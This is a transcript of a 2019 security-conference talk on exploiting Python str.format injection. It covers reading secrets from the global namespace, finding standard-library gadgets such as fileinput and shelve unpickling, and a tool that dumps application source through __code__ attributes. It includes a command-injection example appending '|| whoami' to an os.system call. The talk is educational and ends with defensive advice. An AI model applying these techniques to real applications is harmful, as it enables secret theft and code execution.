← All talks

Brain Welch - Python Standard Library Gadgets for Upgrading Format String Exploits

BSides Augusta20:59102 viewsPublished 2019-10Watch on YouTube ↗
Show transcript [en]

afternoon guys I'm I'm gonna be talking to you today about techniques for upgrading Python format exploits I'm a cyber operations officer over at Fort Gordon and I just enjoy doing this research from my free time so hoping to share some knowledge with you guys today so we're gonna start out pretty basics just talk about format strings some basic vulnerabilities you might encounter and then we'll go into more some of the exploit upgrade techniques and then we'll finish it out with a tool demo for automating some of this stuff so we are gonna look at some code today so if that's not your thing I'm gonna do my best to start from the ground up and just explain all the

details and we are only focused on C Python so none of the other implementations if you don't know what those are then we're probably going to be talking about the Python that you do know and love already and then all the code samples from this talk are only tests in Python 37 so if you run it on your own computer try to mirror that environment so we'll just start out with some background so first you see we got a little demo of what a format string actually is it's just a nice way of formatting strings really it's pretty descriptive name you can just pass different methods or different values into it and it'll turn them into a

string for you how you want them it's actually one of three different ways to do it in Python you got your percent style strings the dot format method that we're gonna be only exploring today and then at newer versions of Python have something called an F string which you see at the bottom there but again we're only gonna be looking at the dot format method and the vulnerabilities associated with that today so just right off the bat we'll just start looking at how these things might be vulnerable you see up at the top we've got two pretty similar code samples but there is a subtle difference and if you notice that's in these parentheses here and

what that's doing it's causing our input that we're passing in to actually have dot format called on it as well so when you're using format strings in your code you never ever want to call dot format on unvalidated user input and you see in the right sample here that's actually what we're doing so in this sample that Jess opposed print your first name and then the first letter of your last name if we mess around with it we can actually access some Python attributes that we're doing here and for those of you not familiar with format strings this 0 here just means we're doing this to the 0 with our first thing that we pass to the format method which

is this last name variable we have here so now we got a basic understanding of some of these vulnerabilities what can we do with this so you can really kind of abuse the way Python stores different attributes on its instances of classes so in this example up here you see we have some sensitive data that we really shouldn't be able to access from untrusted user input but because of the way we have this class define within an it method on it we're actually able to inject into the class attribute of the zero a thing we pass a format move up to the init method and then dump the entire global namespace and this works just due

to the way that Python creates its classes and methods on those classes so when the c python interpreter creates this class whenever it executes this defined statement or this definition statement to make this method its capturing the entire global namespace that that method has exposed to it at the time that that code gets executed and that's all being packaged up in this Global's dictionary and you see from this format string injection here we're actually able to dump out that secret token that you really shouldn't be able to read so this is a pretty contrived example but if you can imagine this super secret variable being something like an AWS key or other sensitive keys store in memory in your web application

then format strings are a way to read that data which is pretty dangerous however we are limited and what we can do with format strings you see in the below example here we have another pretty contrived example of a calculator and in our format string we're trying to call the add 1 1 method so we can print out 2 but and the error message we get we see that it says calculator doesn't have an attribute add and that's because C pythons not going to just execute any function that you call in a format string and we'll do that in an F string which is a newer thing about Python but it'll try to only access

attributes and uh when you call dot format so we can read the global namespace that's pretty good in a lot of cases but if we want to write like a real exploit like execute arbitrary code or something like that we gotta dig a little bit deeper so we're gonna dig a little bit into the C Python internals that's the code snippet we have up at the right side there this is kind of how field resolution is done in a format string you can see it's willing to do two things for us that's call get adder on an object and call get item on an object and we're gonna explore that a little more the next slide but just know

that we are able to trigger some kind of execution within a format string and we're not only able to just access attributes or print strings or numbers or stuff like that and the way this works is because of these three magic methods in Python and that's the get item method the get attribute method and the get adder method and for those of you guys not super familiar with Python these are kinda supposed to be interfaces for programmers to be able to create like list like interfaces or other magic things where you can say my object dot a field and be able to pull that field up out of anywhere no matter what so if you're implementing like your

own list type you might use a get item and that would let you access random attributes through the square brackets so we kind of see an example of that in this format string down here where we're trying to access the zero index of the object we pass as the 0 with argument which is our get item instance and then we try to access some other attributes on one and to that we're also passing in our format call and so get a door and get attribute are pretty similar there are some subtleties and the differences in the way they operate though yet adder will only be called if python can't resolve the attribute you're trying to

access through its standard methods but yet attribute will be called no matter what so if you're trying to implement your own magic lookup object or something like that you probably want to go with get a derp cuz you can run into some weird recursive problems with get attribute but this is just trying to demonstrate to you guys that we can in fact execute some functions like we saw in the previous slide we couldn't execute our calculators ad method but we can trigger execution with get item get a tour and get attribute so going on this theme we're gonna try to look for some gadgets within the Python standard library that have kind of vulnerable definitions of this get item get a tour

and get attribute because we can't in fact execute code with them so we have a pretty and contrived example of something that would be vulnerable and would be useful by us that's this file Lister class and we definition that is just calling OS dot system OS that system will just run a shell command for you and this class is kind of naively just appending pattern to LS to try to list something that matches that pattern so you see we have an example here we instantiate our object and then we're accessing a pattern through the get item square brackets and it's printing out two different files I match that pattern but if we use some shell operators like

we got the double pipe here and that just means it'll execute the following command if the first one failed we're actually executing in this line LS 1 2 3 and then pipe pipe Who am I so LS 1 2 3 is gonna fail because there's no 1 2 3 file and then pipe piping that - who am i means Who am I is gonna win and it just prints out my computer name and user name that you can see at the bottom if when that dialog disappears and right there yeah I name my computer Brian jr. alright so now that we kind of have an idea of how we can abuse these different getitem get a tour and get attribute

methods I did some digging through the Python or C Python standard library for different modules and classes that are potentially that can potentially be abused if you can find them in memory in your format string injections the first one I found of the two we're going to look at today is the file input module and this is a module that just lets you read simultaneously from different open input streams and that can really be abused because they did in fact provide us with a getitem definition that lets you read from different lines in the file you do have to read these lines in succession so it's a little limited but if you had a format string

injection and we're able to find a file input object that's open floating around in memory you would be able to read data from whatever file is open by iterating through these brackets that in turn call to get item method of that class so that is fairly limited it doesn't give us code execution but file disclosure still a bigger win than just the Python reading from the Python global namespace the next module I want explore is called the shelve module for those of you guys not familiar with pickling it's pythons method of serializing Python objects and two bytes that could then be stored on a file on your system or stored in the database and this is a pretty cool

feature but it also has a lot of associated security vulnerabilities when you're serializing and then subsequently deserializing bytes into a Python object you're actually able to execute arbitrary code based on the input or based on the bytes that you pass to the deserialize method and so we can see that this getitem implementation of shelf is doing kind of a lot you really only supposed to be reading objects from get item and not executing a lot of code on the side this kind of called a side-effect so you can see here that it's doing some lookups on the dictionary store and internally to shelf and then it's calling a unpick ler on it or instantiating an on Pickler class and

then loading it so this isn't like a straightaway wind gadget you do need to do some massaging to get the right bytes in memory that you could then trigger through a format string injection but what I want to do with this file input and shelve example to show you guys that when these getitem get a tour and get attribute implementations try to do too much you can abuse them and if you're able to get them in the right condition you could use them for your own exploits upgrade beyond the global namespace reads but when you're looking for these these gadgets within a proprietary application you don't necessarily have a lot of insight into what kind of code the

application you're injecting into is running so I've devised the way where you can actually extract the full source code of any applications that you're targeting and the reason I'm this is possible is because of the code attribute that gets stored on function objects in Python and this is a pretty cool side effect of the Python runtime that whenever the Python interpreter compiles a function object it'll store a lot of runtime metadata on that object and that all is stored on this double underscore code attribute so in the example we have here we're just defining a simple function that's just printing something out we're storing the code attribute or we're printing it out rather on this line you see it's a code

object and this code object has a lot of different metadata on it the first one that we're looking at being the KO code attribute and you see just prints out a bunch of random bytes but that's actually the raw Python bytecode that the interpreter would execute when you actually call this function and python ships with a bytecode disassembler in the disk module so over here we're just printing out the disassembled byte code here so this gives a little more insight it's not super readable if you're not familiar with python byte code but pythons a stack based interpreter so it's just doing pushing some items on the stack popping them off and then calling our print function and another

piece of metadata on this code object is the cocon item which you see here our string that we're printing is actually stored as one of these constant values so these are just two of 10 to 15 attributes that are on these code objects and if you instruct all of them you're able to reassemble these code types and then we can decompile them back into source code so there's some pretty cool Python by code D compilation engines out there I think the best one is the open source on compiled six project which does some pretty slick stuff under the hood look for tendencies in Python bytecode and it's able to reassemble them back into Python source

code so if we're able to actually pull out all of the double underscore code object attributes we can package them back up into a code type what you see here and then the are all the different metadata attributes that we have to pull out we only looked at two of them but no there's quite a few and then we can decompile that code object with this function call here and it prints out some of its it's the compilation metadata and then you see it returns us that print statement at the end which is actually the print statement that was in our function we defined earlier so that's pretty cool and because all of these code attributes are just that

attributes we can access all of them from format string injections and because of this we can kind of put it all together into a neat little tool that can automate all this and so kind of the steps we would follow our first we have to manually find our format string injection vulnerability this tool won't do anything magic forest and that regarded you do have to identify yourself and from there if we're able to break into the Python global namespace then we can actually read but then we can escape into pretty much any Python object that's loaded into memory and that can also be adjacent modules into the one that we break into and we can

recursively visit everything in memory at that point and dump all of their different code attributes and decompile all that maintaining some kind of semantic understanding of where we're at in the Python namespace and reconstruct vulnerable application source code so in order to put all that together I created this tool called 4matic it's on my github if you guys want to check it out but a house of a demo prepared that we'll look into here so we're gonna just look through some terminal output together during the tools run time if you guys aren't familiar with Athena morg it's a pretty sweet service for recording terminal sessions and this isn't actually video this is all text you can copy/paste so I

think if you guys ever do demos like this I think it's a pretty sweet tool to use but we'll dive into this right now

so we start out looking in the vulnerable application that we're going to use for example which is just a vulnerable command-line application so we'll start out looking there you see there's some data and we'll scroll down to the actually vulnerable piece of code that allows us to inject into it so keep scrolling so the actual reason we're able to inject into this piece of software is because of it you call it it takes the inject argument straight from the user and then we'll call format on it and as we touched on earlier in this talk that's something you should never ever do so this application is vulnerable and where once we get through this examination you'll see in the demo

that we do inject into it just as a sanity check but wait for us to exit the firm here and then this is how the vulnerable command-line application gets invoked we can pass a format string into the inject parameter and it will print out for us this dummy class that is what is what is the parameter that gets passed format so next up we're gonna see it this tool get run so we invoke it as a Python module and then what you pass to this tool is the actual command line of how you inject into this command so you'll see we're calling the same thing but we're calling the same command that we call just up here but we're just

having it's fuzz parameter be these two at signs and it'll object-- all the different format strings it's gonna run into there so we'll let it go and you see right away it's already enumerated a bunch of different attributes based on the injection so the first thing it's going to do on a class attribute you actually have this basis tuple which is all the base classes of that class because this class only has the base class of object you only see that it's going through the first one and trying to pull out different metadata from that class but it's already able to pull out the docstring as well as the name and everything but because that

class is empty definition you don't see any methods getting pasted but as we keep going it's able to extract fully all the functions that are within that class including class level attributes up here and it pastes the ore it dumps the full source code out to the terminal so if we let this run it'll keep recursively walking the entire global namespace all of the different Python standard library modules are blacklisted so it won't recursively walk forever and then you see its runtime caps out and we get to the end and the last thing it printed out was the main method so I think it's pretty cool that just from one injection you're able to do all of these able to

access all this different stuff and extract a lot of different sensitive information and if you're able to find the right gadgets from the source code you dump out you can upgrade your exploits code execution or file disclosure so as I've been reiterating during the talk don't call format on untrusted user input it's just gonna lead to bad things for you and then also don't get too creative with your get item get attribute and get adder methods they really shouldn't have side effects of any kind and thanks for your time guys that pretty much concludes my talk but you can find these slides at the link and feel free to reach out and I'll be taking questions now yes yes

oh yeah I like doing that kind of stuff for sure CTFs and crack meas and stuff yeah for different vulnerable machines and yeah yeah not in my job but in my free time all right well thanks for your time guys feel free to come up and ask me any questions if you have them I do have some stuff to give out I'll give the first one out to the gentleman that I asked a question but if anyone else has squash and all give that something else as well

I'll blue sweet all right thanks guys appreciate it what

so f strings isn't really vulnerable to this because they get evaluated at compile time not at run time so it's not really applicable but how the color question did go first go

[Applause]

[ feedback ]